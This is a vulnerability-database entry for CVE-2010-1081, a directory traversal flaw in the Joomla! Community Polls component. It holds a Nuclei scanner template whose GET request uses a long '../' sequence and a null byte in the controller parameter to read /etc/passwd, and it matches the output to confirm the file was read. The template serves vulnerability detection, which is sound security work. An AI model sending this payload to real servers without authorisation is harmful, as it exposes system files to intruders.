Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1081
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
7

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.7 Medium

AI Score

Confidence

Low

0.378 Low

EPSS

Percentile

97.2%

A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1081

info:
  name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/11511
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1081
    - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1081
    cwe-id: CWE-22
    epss-score: 0.37754
    epss-percentile: 0.97206
    cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: corejoomla
    product: com_communitypolls
  tags: cve,cve2010,joomla,lfi,edb,corejoomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220228cf9600a1dd63059d5e2ae690546f448bb168b4aac5013ee1511b66f279402022100c2aed62495d6728080edeb426772b88be9b02b07d3c183921755b2758ef70cbc:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.7 Medium

AI Score

Confidence

Low

0.378 Low

EPSS

Percentile

97.2%